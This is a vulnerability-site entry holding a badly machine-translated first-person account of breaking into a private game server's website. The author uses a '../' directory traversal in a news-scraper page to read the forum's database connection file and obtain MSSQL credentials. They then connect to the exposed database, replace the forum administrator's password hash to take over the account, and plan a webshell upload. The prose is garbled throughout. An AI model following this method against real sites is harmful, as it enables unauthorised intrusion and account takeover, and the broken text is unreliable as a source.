Minutes down the law, quickly click a entertainment Station-vulnerability warning-the black bar safety net

ID MYHACK58:6220066468
Type myhack58
Reporter 佚名
Modified 2006-01-18T00:00:00


“In order to She is again reluctant to talk about the theory of love,and then cheer to comfort the understanding of others”, and I do,“I in order to it again efforts to combat, again fen for themselvesservice......” Unfortunately this entertainment station in Saga private server in the equipment being fried to the sky-high, I don't know how to engage, want to engage in good point of combat gear is also very hard, as the saying goes on the more oppressive the environment is the more you want to resist. Because the gameserviceand the website is the same host, it seems it'sservicereally good performance myself. Would have been going from forum to start with, unfortunately the Forum is to use themoving web, and is the latest version, it seems to have been publishedvulnerabilityhad no effect, or from the other place to start. In the analysis of the process, found a very interestingvulnerability, that is, Web site programmers write the news of the thief system. Below we take a look at how interesting.

We have not found Figure 1 in the IE address bar the URL is how? Looks really a little problem, Well, Yes, it's really a problem. The following is my action confirmed myself, some with“<%%>”tag of the code in the IE browser is not displayed, it is necessary to view the source code before they can see the ASP program code. As can be seen, with the“../”to skip transcoding the filename is valid, it seems and is a not pay attention to the problem. When I changed it to the URL after submit, it“Show. the asp”will be very conscious of to help me read I to file. Since now there is no upload”WebShell”, the plan from BBS upload ASP the back door to renamed. So I put“Show. asp? Url=FileFullName”to the forum directory“Conn. asp”,look at the forumdatadatabase connection information. Wow, anything with~in! It Forum is with MSSQL, and also from the“Conn. asp”is found in the SQL of thedatalibrary account, but then again carefully think about, it the user is not“SA”, it seems that the account permissions are not high, the most is to edit that forumdataLibrary, a little pessimistic. Quickly back through the mood, in fact, to get to the“WebShell”the use of this permission have been sufficient. Because I can also modify thedatain the library of a grass one wood., including its BBS back office ID, but they have not put that to the MSSQL port mapping out of it, think it's different then do not say, take practical action to confirm, now use the”Telnet IP 1 4 3 3”Test, even on a really day to help me also. The following figure is I use” SqlBrowers”even go up, because the SQL language is somewhat cumbersome, if some issues I'm afraid wrong with it, if it can in a graphical interface to modify thedata, you can remove those unnecessary trouble. This tool is very simple, I don't have one in the description. Even on MSSQL after you open itmoving webForumdatalibrary“Dv_Admin”on the table, the next thing to do is bait and switch, first it turns out that the“Password”of the ciphertext is preserved when the full control of the background to put it source to the ciphertext is written back, so mysteriously, and then use the MD5 password generator generates a ciphertext. The back of the process here I will not explain, because the back is upload the ASP files are almost the same.

Isn't there a news thief system there is also such a simplevulnerability, and is one of thoseloopholesput the security threat to the Forum, and then by the forum to tap into the entire system, by virtue of thisvulnerabilityin just a few minutes get King Dragon, really weird